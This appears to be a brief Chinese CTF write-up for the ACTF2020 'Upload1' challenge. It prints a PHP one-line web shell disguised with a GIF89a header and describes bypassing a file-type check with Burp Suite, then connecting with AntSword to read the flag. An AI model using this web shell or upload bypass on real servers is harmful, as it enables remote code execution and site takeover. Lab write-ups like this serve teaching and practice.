[ACTF2020 新生赛]Upload1

不拿flag不改名2024-09-12 13:20

1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马

GIF89a? <script language="php">eval($_REQUEST1)</script>

2、使用bp抓包修改后缀,点击发送

3、不关浏览器的代理,在bp中将该包放行

4、用蚁剑连接

5、在根目录中找到flag

相关推荐
针叶8 小时前
Google Play加固保护导致的崩溃
android·安全·google
执明wa10 小时前
Android Studio 项目目录结构全方位详解
android·ide·android studio
__Witheart__11 小时前
Android编译错误:Soong阶段因缺失res目录导致panic (Iwlan模块)
android
酿情师12 小时前
逆向exe文件:CRT 初始化流程详细分析
android·软件构建·逆向·re·crt‘
问心无愧051314 小时前
ctf show web入门71
android·前端·笔记
夜勤月14 小时前
AQS 与 ThreadPoolExecutor 深度拆解:JDK 高并发底层设计精髓
android·java·开发语言
Yeyu14 小时前
Android 卡顿诊断 SDK:从痛点出发的设计思考
android
上天_去_做颗惺星 EVE_BLUE15 小时前
Ubuntu Android 虚拟机安装使用教程
android·linux·测试工具·ubuntu·安卓
我命由我1234515 小时前
Android 开发问题:Could not find com.github.PicnicSupermarket:FingerPaintView:1.2.
android·github·android studio·安卓·android jetpack·android-studio·android runtime
热门推荐
01GitHub 镜像站点022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03Codex 下载安装指南:Windows 和 macOS 官方版下载04【AI】2026 年具身智能模型和世界模型总结05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch 下载、安装与使用配置指南【2026.5.29】08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09Codex 接入 DeepSeek API 完整配置文档10CC-Switch & Claude 基于 Linux 服务器安装使用指南